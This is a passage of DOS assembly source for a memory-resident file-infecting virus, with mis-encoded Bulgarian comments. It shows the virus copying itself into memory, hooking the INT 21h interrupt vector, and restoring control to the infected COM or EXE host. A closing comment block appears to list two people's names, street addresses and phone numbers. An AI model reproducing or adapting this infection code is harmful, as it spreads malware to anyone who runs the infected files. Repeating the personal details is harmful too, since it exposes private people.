int 21h ; DOS Services ah=function 4Ah,
|
||
; change mem allocation, bx=siz
|
||
mov ax,es
|
||
dec ax
|
||
mov ds,ax
|
||
mov word ptr ds:[01h],08h ; (FEAD:0001=1906h)
|
||
call sub_10
|
||
mov bx,ax
|
||
mov cx,dx
|
||
pop ds
|
||
mov ax,ds
|
||
call sub_10
|
||
add ax,ds:[06h] ; (FF95:0006=0C08Eh)
|
||
adc dx,0
|
||
sub ax,bx
|
||
sbb dx,cx
|
||
jc allright ; Jump if carry Set
|
||
sub ds:[06h],ax ; (FF95:0006=0C08Eh)
|
||
allright:
|
||
mov si,di ;
|
||
xor di,di ; ®²¬¥±²¢ ¥ ±¯°¿¬® ±¥£¬¥²
|
||
push cs ; ³±² ®¢¿¢ ¥
|
||
pop ds ; °¥£¨±²°¨²¥
|
||
sub si,offset kt1 - offset entry_point ; DS:SI
|
||
mov cx,vir_length ; ¨§·¨±«¿¢ ¥ ° §¬¥°
|
||
inc cx ; ¢¨°³±
|
||
rep movsb ; ¯°¥µ¢º°«¿¥ ¢¨°³±
|
||
mov ah,62h
|
||
int 21h
|
||
dec bx
|
||
mov ds,bx
|
||
mov byte ptr ds:[0],5ah
|
||
mov dx,offset virus ; DX - ®²¬¥±²¢ ¥ ®¢¨¿ ¢¥ª²®°
|
||
xor ax,ax
|
||
push ax
|
||
pop ds
|
||
mov ax,es
|
||
sub ax,10h
|
||
mov es,ax
|
||
cli
|
||
mov ds:[21h*4],dx
|
||
mov ds:[21h*4+2],es
|
||
sti
|
||
dec byte ptr ds:[47bh]
|
||
go_to_program: ;
|
||
pop si ; § °¥¦¤ ¥ SI ®² ±²¥ª
|
||
cmp word ptr cs:[si-compbuff],'ZM'
|
||
jnz com_ret
|
||
|
||
|
||
exe_ret proc far
|
||
|
||
pop ds
|
||
mov ax,word ptr cs:[si-comp_code]
|
||
mov bx,word ptr cs:[si-compbuff1+2]
|
||
push cs
|
||
pop cx
|
||
sub cx,ax
|
||
add cx,bx
|
||
push cx
|
||
push word ptr cs:[si-compbuff1]
|
||
push ds
|
||
pop es
|
||
call zero_regs ; ³«¨° ¥ °¥£¨±²°¨²¥
|
||
ret
|
||
|
||
exe_ret endp
|
||
|
||
|
||
com_ret:
|
||
pop ax
|
||
mov ax,cs:[si-compbuff] ;
|
||
mov cs:[100h],ax ; ¢º§±² ®¢¿¢ ¥
|
||
mov ax,cs:[si-compbuff+2] ; ®°¨£¨ «¨²¥
|
||
mov cs:[102h],ax ; ¨±²°³ª¶¨¨
|
||
mov ax,100h ; ¯®£®²®¢ª ¤°¥± CS:100
|
||
push ax ; ¤°¥± ¢°º¹ ¥ cs:ax
|
||
push cs ; ¢º§±² ®¢¿¢ ¥
|
||
pop ds ; DS
|
||
push ds ; ¨
|
||
pop es ; ES
|
||
call zero_regs ; ³«¨° ¥ °¥£¨±²°¨²¥
|
||
ret ; ¯°¥µ®¤ ¢ · «®²® ¯°®£° ¬ ²
|
||
endpr: ; ª° © ¯°®¶¥¤³° ²
|
||
|
||
code ends ; ª° © ¯°®£° ¬ ²
|
||
end entry_point ; ¢µ®¤ ²®·ª ¯°¨ ±² °²¨° ¥
|
||
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
; Ÿ¨ ‹¾¡®¬¨°®¢ <20>° ª®¢ , Œ¨µ ©«®¢£° ¤ ³«."ƒ.„ ¬¿®¢" 6
|
||
; , ²¥«.2-13-34
|
||
; ‹¾¡®¬¨° Œ ²¥¥¢ Œ ²¥¥¢ , ‘®´¨¿ ³«."<22>³¤ ¯¥¹ " 14
|
||
; , ²¥«.80-28-26
|
||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||
|